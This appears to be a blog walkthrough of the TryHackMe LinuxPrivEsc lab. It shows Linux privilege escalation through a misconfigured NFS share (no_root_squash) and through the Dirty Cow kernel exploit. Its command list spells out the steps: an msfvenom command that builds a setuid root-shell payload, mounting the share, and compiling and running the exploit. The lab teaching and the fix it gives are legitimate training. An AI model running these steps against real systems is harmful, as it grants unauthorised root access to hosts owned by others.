Introduction

We covered Linux Privilege Escalation through enumerating NFS shares and using kernel exploits as part of LinuxPrivEsc room from TryHackMe.

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the “nobody” user.

Kernel exploits can leave the system in an unstable state, which is why you should only run them as a last resort.

Exploiting NFS (Network File System)

First up, I’ll tackle an NFS share. After logging into the target machine, my goal is to escalate my privileges.

  1. Enumeration: I start by checking the NFS configuration, which is usually found in the /etc/exports file. In this case, I find a share located at /temp with read/write permissions and, most importantly, the no_root_squash option enabled.
  2. Understanding no_root_squash: This is a critical misconfiguration. It means that if I access the share as the root user from my machine, my user ID won’t be “squashed” or demoted to a low-privilege user. I’ll remain root on the remote share, which is a huge security risk.
  3. The Attack:
    • On my attacker machine, I create a local directory (e.g., /temp/nfs) and mount the target’s NFS share to it.
    • Next, I use msfvenom to generate a malicious payload. This payload is designed to give me a shell with root privileges. I save this payload directly into the mounted NFS directory.
    • Because no_root_squash is active, this payload now sits on the target system with root ownership. I make the payload executable and add the setuid permission. This special permission allows any user who runs the file to do so with the owner’s privileges (in this case, root).
    • Finally, back on the target machine, I simply execute the payload. VoilĂ ! I get a root shell.

For those looking to secure their systems, I also explain that simply removing the no_root_squash option from the /etc/exports file is the way to fix this vulnerability.

Leveraging Kernel Exploits

Kernel exploits are powerful but can be risky. I generally save these as a last resort in a real-world penetration test because a bad exploit can crash the system.

  1. Finding Vulnerabilities:
    • The first step is to identify the kernel version. I can do this with commands like uname -a or by reading the /proc/version file.
    • With the version number, I can search for known exploits. For the kernel in this video, the infamous “Dirty Cow” exploit is a perfect match.
    • An even easier way is to use an automated script. I demonstrate how to run linux-exploit-suggester, a Perl script that checks the kernel version against a database of known vulnerabilities. As expected, it flags Dirty Cow among others.
  2. Execution:
    • I navigate to the directory containing the Dirty Cow exploit, which is a C file.
    • I compile the exploit code using gcc.
    • Running the compiled exploit modifies the /usr/bin/passwd binary in a way that lets me elevate my privileges to root.
    • Once I have root access, I show how to be a good guest and restore the original passwd binary from the backup the exploit created.

To wrap things up, I point out a few other useful privilege escalation scripts like linenum, linpeas, and lse.sh that are available in the tools directory.

Technical Commands

Here are the commands I used throughout the demonstration:

  • cat /etc/exports – To check the NFS share configuration.
  • sudo -i – To switch to the root user.
  • mkdir /temp/nfs – To create a directory for mounting the NFS share.
  • mount -o rw,vers=2 10.10.10.10:/temp /temp/nfs – To mount the remote NFS share (IP is an example).
  • ls -la – To list files and their permissions.
  • msfvenom -p linux/x86/exec CMD="/bin/bash -p" -b "\x00" -f elf -o /temp/nfs/shell.elf – To create the malicious payload.
  • chmod +x,+s /temp/nfs/shell.elf – To make the payload executable and set the SUID bit.
  • /temp/shell.elf – To execute the payload on the target.
  • id – To check the current user’s ID.
  • exit – To exit the shell.
  • rmdir /temp/nfs – To remove the mount directory.
  • uname -a – To check the kernel version.
  • cat /proc/version – Another way to check the kernel version.
  • perl linux-exploit-suggester.pl – To run the exploit suggestion script.
  • gcc -pthread dirty.c -o cow -lcrypt – To compile the Dirty Cow exploit.
  • ./cow – To run the compiled exploit.
  • mv /tmp/back /usr/bin/passwd – To restore the original passwd binary.
  • passwd – To interact with the (now modified) passwd utility.

TryHackMe Room Answers

What is the name of the option that disables root squashing?

 

Video Walkthrough

 

 

 

,
Show Comments

The MasterMinds Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles